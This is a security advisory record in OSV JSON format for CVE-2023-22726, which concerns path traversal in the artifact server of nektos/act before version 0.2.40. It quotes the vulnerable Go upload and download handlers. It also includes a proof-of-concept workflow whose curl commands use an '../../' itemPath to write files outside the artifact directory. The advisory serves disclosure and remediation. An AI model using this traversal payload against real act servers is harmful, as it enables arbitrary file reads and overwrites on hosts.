{
  "schema_version": "1.4.0",
  "id": "GHSA-pc99-qmg4-rcff",
  "modified": "2023-02-03T20:47:31Z",
  "published": "2023-01-20T16:00:36Z",
  "aliases": [
    "CVE-2023-22726"
  ],
  "summary": "act vulnerable to arbitrary file upload in artifact server",
  "details": "### Impact\nThe artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation.\n\n\n#### Issue 1: Arbitrary file upload in artifact server (GHSL-2023-004)\nThe [/upload endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2) is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open.\n\n```\nrouter.PUT(\"/upload/:runId\", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\t\titemPath := req.URL.Query().Get(\"itemPath\")\n\t\trunID := params.ByName(\"runId\")\n\n\t\tif req.Header.Get(\"Content-Encoding\") == \"gzip\" {\n\t\t\titemPath += gzipExtension\n\t\t}\n\n\t\tfilePath := fmt.Sprintf(\"%s/%s\", runID, itemPath)\n```\n\n#### Issue 2: Arbitrary file download in artifact server (GHSL-2023-004)\nThe [/artifact endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245) is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server.\n\n```\nrouter.GET(\"/artifact/*path\", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\t\tpath := params.ByName(\"path\")[1:]\n\n\t\tfile, err := fsys.Open(path)\n```\n\n#### Proof of Concept\nBelow I have written a Github Action that will upload secret.txt into the folder above the specified artifact directory. The first call to curl will create the directory named 1 if it does not already exist, and the second call to curl will upload the secret.txt file to the directory above the specified artifact directory.\n\nWhen testing this POC, the `--artifact-server-path` parameter must be passed to act in order to enable the artifact server.\nReplace yourIPandPort with the IP and port of the server. An attacker can enumerate /proc/net/tcp in order to find the artifact server IP and port, but this is out of the scope of this report. Please let me know if you would like a copy of this script.\n\n```\nname: CI\non: push\n\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n    - run: echo \"Here are some secrets\" > secret.txt\n    - run: curl http://<yourIPandPort>/upload/1?itemPath=secret.txt --upload-file secret.txt\n    - run: curl http://<yourIPandPort>/upload/1?itemPath=../../secret.txt --upload-file secret.txt\n```\n\n### Remediation\n1. During implementation of [Open and OpenAtEnd for FS](https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65), please ensure to use ValidPath() to check against path traversal. See more here: https://pkg.go.dev/io/fs#FS\n2. Clean the user-provided paths manually\n\n### Patches\nVersion 0.2.40 contains a patch.\n\n### Workarounds\nAvoid use of artifact server with `--artifact-server-path`",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/nektos/act"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.40"
            }
          ]
        }
      ],
      "database_specific": {
        "last_known_affected_version_range": "<= 0.2.39"
      }
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/security/advisories/GHSA-pc99-qmg4-rcff"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22726"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/issues/1553"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/commit/63ae215071f94569d910964bdee866d91d6e3a10"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nektos/act"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nektos/act/releases/tag/v0.2.40"
    },
    {
      "type": "ADVISORY",
      "url": "https://securitylab.github.com/advisories/GHSL-2023-004_act"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-434"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-20T16:00:36Z",
    "nvd_published_at": "2023-01-20T22:15:00Z"
  }
}